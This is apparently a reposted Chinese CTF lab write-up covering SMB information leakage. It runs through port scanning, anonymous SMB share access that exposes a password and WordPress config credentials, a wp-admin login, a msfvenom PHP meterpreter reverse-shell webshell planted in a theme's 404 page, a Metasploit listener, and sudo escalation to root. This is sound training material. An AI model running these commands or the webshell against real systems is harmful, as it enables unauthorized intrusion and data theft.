码迷,mamicode.com
首页 > 其他好文 > 详细

CTF-SMB信息泄露详细版

时间:2020-04-01 23:30:50      阅读:224      评论:0      收藏:0      [点我收藏+]

标签:优化   raw   meta   网页   exp   hpa   awd   erp   源文件   

SMB信息泄露

攻击机ip:192.168.1.2

靶机ip:192.168.1.3

 

首先先介绍下SMB服务。以下来至百度

SMB(Server Message Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。后来Linux移植了SMB,并称为samba。

SMB协议是基于TCP-NETBIOS下的,一般端口使用为139,445

SMB协议,计算机可以访问网络资源,下载对应的资源文件

 

首先我们先扫描端口。 nmap -sV 靶场ip

技术图片

发现http端口开启,那么我们用dirb命令扫描下网站目录,发现了两个登陆页面

phpadmin和wp-admin

技术图片

 

 

那么我们就继续挖掘信息寻找登陆账号和密码。我们发现SMB端口打开,那么我们使用命令

smbclient -L 靶场ip   ---查看SMB有哪些开放得服务资源

提示输入密码,那么我们使用弱口令或者空口令尝试,发现空口令可以成功登陆

最后我们发现得三个资源中只有share$能进行访问,那么我们就使用命令smbclient ‘\\靶场ip\share$‘进去

技术图片

发现有三个.txt文件,我们逐一下载(使用get下载)

打开deets.txt发现有个密码,我们把它记下,或许后面有用

技术图片

我们此时找到了一个密码,那还需要用户名,我们在继续在share$里面找找。想起我们有一个登陆页面是wp-admin,那再share$里面不是有个类似得wordpress嘛,我们cd进入试试,这一试不得了啊,发现了不少好多西

技术图片

看见了配置文件,那么我们直接把它get下来,然后查看发现了username和password!

技术图片

那我们直接拿这两个再wp-admin登陆页面登陆。哎!登陆成功了!进入了网站的后台!

技术图片

既然进入了后台,那么我们肯定回本能的想留下个webshell,那么开搞!

使用msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机IP地址 lport=4444 -f raw > /root/Desktop/shell.php

这条命令在我们攻击机的桌面上形成一个shell.php的webshell。然后我们打开网站后台的Appearance目录下的editor,在404页面上传webshell代码

技术图片

然后打开metalspolit,选择hardya模块启动监听

msf > use exploit/multi/handler

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 攻击机IP地址

msf exploit(handler) > set lport 4444

msf exploit(handler) > run

然后通过固定路径http://靶场IP/wordpress/wp-content/themes/twentyfifteen/404.php 获取反弹shell(看网页回显哪个固定路径就使用哪个)

反弹成功,但是我们还需优化会话

技术图片

使用命令python -c "import pty; pty.spawn(‘/bin/bash‘)"进行优化即可

技术图片

然后使用命令cat /etc/paawd 查询用户名,然后发现home目录下有个togie用户,su togie去切换到togie,,su togie。提示需要密码,我们想起之前deets.txt文件中的12345这个密码,输入,成功!然后我们还需要提权到root,那么我们使用命令 sudo su进行提权,成功!

技术图片

既然拿到了froot权限,那岂不是为所欲为了,后面的查找flag.txt我就不写啦!

CTF-SMB信息泄露详细版

标签:优化   raw   meta   网页   exp   hpa   awd   erp   源文件   

原文地址:https://www.cnblogs.com/Hbbbb/p/12616619.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!